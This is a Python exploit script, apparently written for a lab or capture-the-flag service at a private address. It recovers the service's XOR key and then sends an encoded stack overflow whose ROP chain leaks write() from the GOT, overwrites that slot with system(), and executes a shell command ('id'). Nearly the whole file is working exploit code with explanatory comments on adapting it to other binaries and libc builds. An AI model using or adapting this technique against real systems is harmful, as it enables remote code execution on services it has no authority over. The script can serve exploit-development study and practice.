from socket import *
from struct import *
import time
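def cipher(s, key, keylen=128):
    """XOR-transform *s* with a repeating key.

    Character ``i`` of *s* is XORed with ``key[i % keylen]``, so only the
    first *keylen* characters of *key* are ever used; a longer key (which the
    ``recv`` loop below can easily produce, since it reads in 1024-byte
    chunks) is fine. XOR is its own inverse: ``cipher(cipher(x, k), k) == x``.

    Args:
        s: the str to transform (one character per byte, Python 2 ``str``
            semantics -- this does not accept ``bytes`` on Python 3).
        key: str holding at least *keylen* characters.
        keylen: period of the key; defaults to the service's 128-byte XOR key.

    Returns:
        A str of ``len(s)`` transformed characters ("" for empty input).

    Raises:
        IndexError: if *key* has fewer than *keylen* characters and *s* is
            long enough to index past its end.
    """
    # join() instead of repeated += so a 131 kB payload is not rebuilt quadratically.
    return "".join(chr(ord(c) ^ ord(key[i % keylen])) for i, c in enumerate(s))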
# Addresses inside the target binary. They sit at a fixed 0x0804xxxx layout (so the
# binary is presumably not PIE) and are valid only for this exact build -- re-derive
# them with objdump/ROPgadget for any other binary.
read = 0x8048860  # read stub; the chain below calls it as read(fd, buf, n)
write = 0x080489c0  # write stub; it resolves through write_got, so once that slot is overwritten the same call reaches system()
ppppr = 0x80499bc  # presumably a pop;pop;pop;pop;ret gadget -- used as ppppr+1 (three pops) to discard each call's 3 args; confirm in a disassembler
bss = 0x0804b520  # writable scratch area where the command string is staged
write_got = 0x804b3dc  # GOT slot of write(): read once to leak libc, then overwritten with system()
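TARGET = ('192.168.197.130', 20002)  # lab box; adjust per target
OVERFLOW_PAD = 131088  # filler up to the saved return address (buffer + saved registers; binary-specific)
KEY_LEN = 128  # length of the service's XOR key, as used by cipher()
LEAK_BYTES = 4  # one 32-bit GOT entry
# Offsets of write() and system() inside the *target's* libc build. They are only valid
# for that one libc; for any other box re-derive them, e.g.
#   readelf -s libc.so.6 | grep -wE 'write|system'
LIBC_WRITE_OFFSET = 0xc12c0
LIBC_SYSTEM_OFFSET = 0x3cb20


def _recv_at_least(sock, n, chunk=1024):
    """Receive until at least n bytes have arrived and return all of them.

    May return more than n bytes (the last chunk is not trimmed), matching the
    original "recv(1024) until len >= 128" behaviour. Raises EOFError instead of
    spinning forever when the peer closes the connection (recv() then returns ""
    without blocking).
    """
    data = ""
    while len(data) < n:
        part = sock.recv(chunk)
        if not part:
            raise EOFError("connection closed after %d of %d bytes" % (len(data), n))
        data += part
    return data


def _recv_exact(sock, n):
    """Receive exactly n bytes; TCP may split even a 4-byte write across recv() calls."""
    data = ""
    while len(data) < n:
        part = sock.recv(n - len(data))
        if not part:
            raise EOFError("connection closed after %d of %d bytes" % (len(data), n))
        data += part
    return data


def _drain(sock, nbytes):
    """Read and discard nbytes of reply (the service sends len(payload) bytes back)."""
    total = 0
    while total < nbytes:
        part = sock.recv(65000)
        if not part:
            raise EOFError("connection closed after %d of %d bytes" % (total, nbytes))
        total += len(part)


s = socket(AF_INET, SOCK_STREAM)
s.connect(TARGET)
try:
    time.sleep(1)
    s.recv(1024)  # banner / menu prompt, discarded

    # Step 1: recover the XOR key. An "E" request with an all-zero 128-byte message
    # makes the service return key XOR 0 == the key itself.
    msg = "\x00" * KEY_LEN
    # sendall(): send() may transmit only part of a buffer, which would desync the protocol.
    s.sendall("E" + pack('<I', len(msg)) + msg)
    s.recv(121)  # fixed-size reply header (content unused)
    s.recv(4)  # 4-byte length field of the reply; not needed
    s.recv(1)
    key = _recv_at_least(s, KEY_LEN)
    print("[+] Get xor key")

    # Step 2: overflow with a ciphered ROP chain. 32-bit cdecl: each call is
    # func, ret-gadget, arg1, arg2, arg3 -- ppppr+1 (three pops) cleans the args.
    cmd = "id\x00"
    chain = [
        # read(0, bss, len(cmd)): stage the command string in .bss
        pack('<I', read), pack('<I', ppppr + 1), pack('<I', 0), pack('<I', bss), pack('<I', len(cmd)),
        # write(1, write_got, 4): leak write()'s libc address from the GOT
        pack('<I', write), pack('<I', ppppr + 1), pack('<I', 1), pack('<I', write_got), pack('<I', 4),
        # read(0, write_got, 4): overwrite write's GOT slot with system()
        pack('<I', read), pack('<I', ppppr + 1), pack('<I', 0), pack('<I', write_got), pack('<I', 4),
        # write(bss) -> now system(cmd); "AAAA" is the (never used) return address
        pack('<I', write), "AAAA", pack('<I', bss),
    ]
    payload = cipher("A" * OVERFLOW_PAD + "".join(chain), key)
    s.sendall("E" + pack('<I', len(payload)) + payload)
    s.recv(121)
    _drain(s, len(payload))

    # Step 3: leave the menu so the vulnerable function returns into the chain.
    s.sendall("Q")
    s.sendall(cmd)  # consumed by read(0, bss, len(cmd))
    # The original padded a short recv with ASCII "0" (0x30) on the little-endian
    # low-byte side, which yields a wrong address; read the whole 4-byte leak instead.
    leaked = _recv_exact(s, LEAK_BYTES)
    write_addr = unpack('<I', leaked)[0]
    system_addr = write_addr - LIBC_WRITE_OFFSET + LIBC_SYSTEM_OFFSET
    print("[+] System: " + hex(system_addr))
    s.sendall(pack('<I', system_addr))  # consumed by read(0, write_got, 4)
    print(s.recv(1024))  # output of system("id")
finally:
    s.close()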